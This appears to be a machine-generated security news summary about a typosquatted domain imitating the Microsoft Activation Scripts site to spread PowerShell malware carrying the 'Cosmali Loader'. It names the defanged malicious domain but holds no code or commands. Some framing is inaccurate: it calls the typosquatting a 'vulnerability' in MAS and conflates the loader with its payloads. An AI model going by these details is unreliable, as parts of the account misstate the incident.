Ethical Hacking News
Malicious actors have exploited a vulnerability in the Microsoft Activation Scripts (MAS) tool to spread PowerShell malware, infecting systems with the 'Cosmali Loader.' The malicious domain is almost identical to the legitimate one listed in official MAS instructions. Reinstalling Windows and exercising caution when using open-source software are recommended to avoid further infection.
The malicious domain "get.activate[.]win" was used to spread PowerShell malware that infects systems with the 'Cosmali Loader'. The Cosmali Loader is a cryptomining utility and XWorm remote access trojan (RAT). MAS, a popular open-source collection of PowerShell scripts, is viewed by Microsoft as a piracy tool that activates products without purchased licenses. Typosquatting was used to deceive users into executing malicious code. Users are advised to avoid remote code execution and test in a sandbox if they don't understand what it does. Unofficial Windows activators have been used for malware delivery, highlighting the need for user awareness and caution.
Malicious actors have been exploiting a vulnerability in the Microsoft Activation Scripts (MAS) tool, a popular open-source collection of PowerShell scripts used for Windows activation. The malicious domain, "get.activate[.]win," which is almost identical to the legitimate one listed in official MAS instructions, "get.activated.win," has been used to spread PowerShell malware that infects systems with the 'Cosmali Loader.'
The Cosmali Loader is a cryptomining utility and the XWorm remote access trojan (RAT), according to security researcher RussianPanda. The malicious domain was used to deliver pop-up warnings on infected systems, informing users of the compromise.
MAS is an open-source project hosted on GitHub, maintained by a community of developers. However, Microsoft views it as a piracy tool that activates products without purchased licenses using unauthorized methods that circumvent its licensing system. The maintainers of the project have warned users about the risks associated with using such tools and urged them to exercise caution when executing remote code.
Typosquatting, where malicious actors create domains similar to legitimate ones to deceive users, has been a common tactic used by attackers to spread malware. In this case, the similarity between the malicious and legitimate domain is just one character different ("d"), making it likely that users will mistype the domain.
The Cosmali Loader malware's panel is insecure, allowing anyone viewing it to access the infected computer. Users are advised to avoid executing remote code if they don't fully understand what it does, always test in a sandbox, and minimize the risk of fetching dangerous payloads from typosquatted domains.
Unofficial Windows activators have been repeatedly used for malware delivery, highlighting the need for users to be aware of the risks associated with such tools. Reinstalling Windows is recommended as a precautionary measure against further infection.
In conclusion, this incident serves as a warning to users about the dangers of typosquatted domains and the importance of exercising caution when using open-source software for Windows activation. Users must always verify the authenticity of the domain they are entering and be aware of the risks associated with executing remote code.
Related Information:
https://www.ethicalhackingnews.com/articles/Fake-MAS-Windows-Activation-Domain-Used-to-Spread-PowerShell-Malware-A-Cautionary-Tale-ehn.shtml
https://www.bleepingcomputer.com/news/security/fake-mas-windows-activation-domain-used-to-spread-powershell-malware/
https://malwaretips.com/threads/fake-mas-windows-activation-domain-used-to-spread-powershell-malware.138889/
Published: Thu Dec 25 07:10:37 2025 by llama3.2 3B Q4_K_M
